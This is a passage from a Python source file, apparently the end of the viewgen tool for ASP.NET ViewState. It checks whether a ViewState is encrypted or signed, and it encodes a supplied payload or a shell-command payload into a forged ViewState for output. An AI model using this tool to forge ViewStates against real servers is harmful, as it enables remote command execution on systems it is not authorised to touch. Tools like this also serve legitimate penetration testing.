336 | 					print("%s %s" % (candidate[0], candidate[1].upper()))
337 | 			else:
338 | 				warning("No candidates found")
339 | 		else:
340 | 			if viewgen.encrypted:
341 | 				success("ViewState has been decrypted")
342 | 			else:
343 | 				success("ViewState is not encrypted")
344 | 			if signature is None:
345 | 				success("ViewState is not signed")
346 | 			else:
347 | 				hash_alg = list(viewgen.hash_sizes.keys())[list(viewgen.hash_sizes.values()).index(len(signature))]
348 | 				success("Signature algorithm: %s" % hash_alg.upper())
349 | 
350 | 	if generate:
351 | 		if args.command is None:
352 | 			result = viewgen.encode(args.payload)
353 | 		else:
354 | 			result = viewgen.encode(generate_shell_payload(args.command))
355 | 		if args.urlencode:
356 | 			result = urllib.parse.quote(result, safe="")
357 | 		else:
358 | 			result = str(result, "utf-8")
359 | 		print(result)
360 | 
361 | 
362 | if __name__ == "__main__":
363 | 	args = parse_args()
364 | 	run_viewgen(args)
365 | 


--------------------------------------------------------------------------------